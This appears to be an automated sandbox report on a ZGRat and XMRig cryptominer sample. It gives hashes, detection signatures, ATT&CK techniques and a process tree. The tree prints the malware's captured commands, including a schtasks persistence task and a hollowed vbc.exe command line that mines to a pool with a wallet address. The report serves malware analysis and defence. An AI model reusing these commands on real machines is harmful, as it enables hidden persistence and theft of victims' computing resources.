xmrig | 3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56

General

Target

tmp.exe
Size

5.0MB
MD5

a3fb2b623f4490ae1979fea68cfe36d6
SHA1

34bec167e0f95ecc36761f77c93c1229c2c5d1f4
SHA256

3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56
SHA512

370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912
SSDEEP

98304:xrd0tlZ+I89l7cGcGI4G/Mul2rq/aReDkizMeQUz4:x+tlQ4zGk/Mul2rVe4iwVU

Score

10^/10

Malware Config

Signatures

Detect ZGRat V1 4 IoCs

resource	yara_rule
behavioral2/memory/4072-0-0x00000000006D0000-0x0000000000BD4000-memory.dmp	family_zgrat_v1
behavioral2/files/0x00060000000231ea-11.dat	family_zgrat_v1
behavioral2/files/0x00060000000231ea-13.dat	family_zgrat_v1
behavioral2/files/0x00060000000231ea-42.dat	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 14 IoCs

miner

resource	yara_rule
behavioral2/memory/1812-22-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1812-23-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1812-25-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1812-26-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1812-27-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1812-28-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1812-29-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1812-30-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1812-31-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1812-33-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1812-34-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1812-35-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1812-36-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral2/memory/1812-39-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2828415587-3732861812-1919322417-1000\Control Panel\International\Geo\Nation	.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2828415587-3732861812-1919322417-1000\Control Panel\International\Geo\Nation	.exe

Executes dropped EXE 2 IoCs

pid	Process
4140	.exe
2292	.exe

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1812-17-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-19-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-20-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-22-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-23-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-25-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-26-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-27-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-28-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-29-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-30-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-31-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-33-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-34-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-35-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-36-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral2/memory/1812-39-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4140 set thread context of 1812	4140	.exe	98

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2008	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1972	timeout.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
4140	.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
664	Process not Found

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	4072	tmp.exe
Token: SeDebugPrivilege	4140	.exe
Token: SeLockMemoryPrivilege	1812	vbc.exe
Token: SeLockMemoryPrivilege	1812	vbc.exe
Token: SeDebugPrivilege	2292	.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1812	vbc.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 4072 wrote to memory of 3132	4072	tmp.exe	87
PID 4072 wrote to memory of 3132	4072	tmp.exe	87
PID 3132 wrote to memory of 1972	3132	cmd.exe	89
PID 3132 wrote to memory of 1972	3132	cmd.exe	89
PID 3132 wrote to memory of 4140	3132	cmd.exe	93
PID 3132 wrote to memory of 4140	3132	cmd.exe	93
PID 4140 wrote to memory of 5052	4140	.exe	94
PID 4140 wrote to memory of 5052	4140	.exe	94
PID 5052 wrote to memory of 2008	5052	cmd.exe	96
PID 5052 wrote to memory of 2008	5052	cmd.exe	96
PID 4140 wrote to memory of 1812	4140	.exe	98
PID 4140 wrote to memory of 1812	4140	.exe	98
PID 4140 wrote to memory of 1812	4140	.exe	98
PID 4140 wrote to memory of 1812	4140	.exe	98
PID 4140 wrote to memory of 1812	4140	.exe	98
PID 4140 wrote to memory of 1812	4140	.exe	98
PID 4140 wrote to memory of 1812	4140	.exe	98

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp703E.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3132
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1972
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4140
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5052
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2008
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:1812

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2292

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
3.0MB

MD5
854f9f20b25336474553f4ce2733caec

SHA1
837f38af4e9e8fc332cea859418bb285e5a0bb1a

SHA256
face22c2af1faf6f4ebd51d1aaea620f0b57c97d5c3d39ff1604dc7fdf596958

SHA512
ccb7a27d8095b282b11b2c67eb79412550a8ef1bb12449b2a95d690f6b8998260008d89e3bb7ac27e79f45f5832176b1713a5bd8414b5ce8782ab4dd737b8008

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
3.2MB

MD5
9e869a28e5111622ec67f6a0d37b8dcd

SHA1
8567b459eca972bc20a06829041866c7b833cb1a

SHA256
0edafb0467dfca99cea9a89b247107215e14a990a117a04a3df844692f9993cc

SHA512
111cf59f71884849699e9f56af2daf060a4beb82e97468ad108b8655a1d0f946b017e8f6c514e8ecb7dc12fd2d57e2af577d332dac1918f668814e9d0ed38dd0

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
5.0MB

MD5
a3fb2b623f4490ae1979fea68cfe36d6

SHA1
34bec167e0f95ecc36761f77c93c1229c2c5d1f4

SHA256
3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56

SHA512
370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\.exe.log

Filesize
1KB

MD5
e3da8eae01f57153845d1533b6bed268

SHA1
a235712a631c52d2853e9136d9c4431358f34fd2

SHA256
77507c05c8131f73d1dd1500992223819a6ab09cd820716e00bf907c9c7fc857

SHA512
b24b1064f8270981746f49a1b56a1aab21f7985af672bc6dcdbd67e498033714131ba4581c9c3d934e86b56d904bb0ecf322fae498133bbb9cb3a68ea6cad9d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp703E.tmp.bat

Filesize
168B

MD5
ed5bec68f6041492c40424e70708ead4

SHA1
ae3c0f44294c740d8a97c2e2bdd7cc510e2fc8bd

SHA256
cdeb80d648a24656cabd3ba42b5be3f1c42bd9eb27351edab90c34b27e3bac7a

SHA512
ca432d7de3b91b20df9d41fc2ad8cde5034ba1d0caef2e504b873481eb69adeb064074257615924f44dd81be2c9bd1c81012d95b122fb62ec0ef4bb5db3f15af

Download Submit
memory/1812-37-0x0000017C2C130000-0x0000017C2C150000-memory.dmp

Filesize
128KB

Download
memory/1812-25-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-39-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-36-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-35-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-41-0x0000017C2C150000-0x0000017C2C170000-memory.dmp

Filesize
128KB

Download
memory/1812-17-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-19-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-20-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-40-0x0000017C2C130000-0x0000017C2C150000-memory.dmp

Filesize
128KB

Download
memory/1812-22-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-23-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-24-0x0000017C2C0B0000-0x0000017C2C0D0000-memory.dmp

Filesize
128KB

Download
memory/1812-38-0x0000017C2C150000-0x0000017C2C170000-memory.dmp

Filesize
128KB

Download
memory/1812-26-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-27-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-28-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-29-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-30-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-31-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-32-0x0000017C2C0F0000-0x0000017C2C130000-memory.dmp

Filesize
256KB

Download
memory/1812-33-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/1812-34-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2292-44-0x00007FFAC0D30000-0x00007FFAC17F1000-memory.dmp

Filesize
10.8MB

Download
memory/2292-45-0x000000001CCC0000-0x000000001CCD0000-memory.dmp

Filesize
64KB

Download
memory/2292-46-0x0000000001B10000-0x0000000001B11000-memory.dmp

Filesize
4KB

Download
memory/4072-0-0x00000000006D0000-0x0000000000BD4000-memory.dmp

Filesize
5.0MB

Download
memory/4072-9-0x00007FFAC0AE0000-0x00007FFAC15A1000-memory.dmp

Filesize
10.8MB

Download
memory/4072-2-0x00000000035A0000-0x00000000035B0000-memory.dmp

Filesize
64KB

Download
memory/4072-1-0x00007FFAC0AE0000-0x00007FFAC15A1000-memory.dmp

Filesize
10.8MB

Download
memory/4072-3-0x0000000001560000-0x0000000001561000-memory.dmp

Filesize
4KB

Download
memory/4140-21-0x00007FFAC0680000-0x00007FFAC1141000-memory.dmp

Filesize
10.8MB

Download
memory/4140-16-0x0000000001690000-0x0000000001691000-memory.dmp

Filesize
4KB

Download
memory/4140-15-0x00000000016A0000-0x00000000016B0000-memory.dmp

Filesize
64KB

Download
memory/4140-14-0x00007FFAC0680000-0x00007FFAC1141000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads